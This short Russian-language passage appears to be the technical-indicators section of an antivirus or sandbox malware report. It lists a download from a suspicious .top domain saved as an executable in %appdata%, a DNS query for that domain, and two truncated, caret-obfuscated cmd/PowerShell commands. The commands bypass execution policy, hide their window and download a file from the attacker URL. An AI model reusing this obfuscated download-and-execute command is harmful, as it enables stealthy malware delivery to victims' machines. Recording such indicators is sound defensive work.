Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^Er^sh^ELL.eX^E -^e^X^ec^u^tI^onPo^L^ICY byP^Ass ^-nO^pr^O^FiL^E -W^IndoWSt^Y^L^e Hid^dEn ^(n^E^W-O^BjECT sYSTeM^.^N^Et.w^e^B^C^lieN^t).^Do^wN^L^OA^DfILE^('http://smoeroo...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "pow^Er^sh^ELL.eX^E -^e^X^ec^u^tI^onPo^L^ICY byP^Ass ^-nO^pr^O^FiL^E -W^IndoWSt^Y^L^e Hid^dEn ^(n^E^W-O^BjECT sYSTeM^.^N^Et.w^e^B^C^lieN^t).^Do^wN^L^OA^DfILE^('http://smoeroo...' (со скрытым окном)